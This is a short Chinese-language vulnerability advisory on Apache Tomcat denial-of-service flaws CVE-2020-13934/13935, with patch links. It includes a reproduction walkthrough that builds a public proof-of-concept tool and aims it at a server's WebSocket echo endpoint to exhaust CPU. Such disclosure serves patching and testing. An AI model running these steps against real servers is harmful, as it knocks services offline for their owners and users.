漏洞描述
7月16日, Apache基金会发布公告称,Tomcat中间件存在两个拒绝服务漏洞(CVE-2020-13934/13935)。据了解,上述漏洞是Tomcat中间件存在设计缺陷所导致:一是当请求数过多时会发生内存不足异常(OutOfMemoryException),从而导致拒绝服务;二是WebSocket中对载荷长度的验证存在缺陷,无效的载荷长度可能会触发无限循环,从而导致拒绝服务。目前Apache Tomcat官方已发布新版本修复该漏洞。
复现过程:
1.访问ip:port
2.POC下载地址
https://github.com/RedTeamPentesting/CVE-2020-13935
go env -w GOPROXY=https://goproxy.cn
//修改proxy地址
3.go build //编译go程序,输出tcdos.exe
4.攻击服务器
tcdos.exe ws://ip:port/examples/websocket/echoStreamAnnotation
5.Cpu占用率过高,页面无法正常访问
修复建议:
下载官方升级包进行升级:
Apache Tomcat 10.0.0-M7: https://tomcat.apache.org/download-10.cgi
Apache Tomcat 9.0.37: https://tomcat.apache.org/download-90.cgi
Apache Tomcat 8.5.57: https://tomcat.apache.org/download-80.cgi
Apache Tomcat 7.0.105: https://tomcat.apache.org/download-70.cgi